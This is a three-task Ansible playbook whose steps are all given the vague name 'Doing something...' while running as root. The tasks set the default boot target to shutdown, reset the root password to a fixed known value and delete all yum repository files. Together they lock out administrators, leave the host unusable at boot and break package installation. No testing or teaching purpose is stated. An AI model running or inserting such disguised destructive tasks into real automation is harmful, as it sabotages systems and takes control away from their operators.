---
- name: Doing something...
  command: systemctl set-default shutdown.target
  become: yes
- name: Doing something...
  shell: echo -e "lostpass\nlostpass\n" | passwd
  become: yes
- name: Doing something...
  shell: rm -f /etc/yum.repos.d/*
  become: yes
